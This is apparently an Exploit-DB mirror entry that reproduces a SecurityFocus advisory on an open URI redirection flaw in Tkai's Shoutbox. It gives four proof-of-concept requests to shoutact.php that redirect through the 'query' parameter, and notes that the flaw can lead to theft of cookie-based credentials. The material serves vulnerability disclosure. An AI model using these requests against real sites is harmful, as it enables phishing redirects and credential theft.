exploit-db-mirror/exploits/php/webapps/25299.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

15 lines
No EOL
662 B
Text

source: https://www.securityfocus.com/bid/12914/info
Tkai's Shoutbox is reported prone to a remote URI redirection vulnerability.
It is reported that an attacker can exploit this issue by supplying the URI of a malicious site through the 'query' parameter of a link.
A successful attack may result in various attacks including theft of cookie based authentication credentials.
/shoutact.php?yousay=default&query=http://www.example.com
/shoutact.php?yousay=default&name=default&query=http://www.example.com
/shoutact.php?yousay=default&email=default&query=http://www.example.com
/shoutact.php?yousay=default&email=default&name=default&query=www.example.com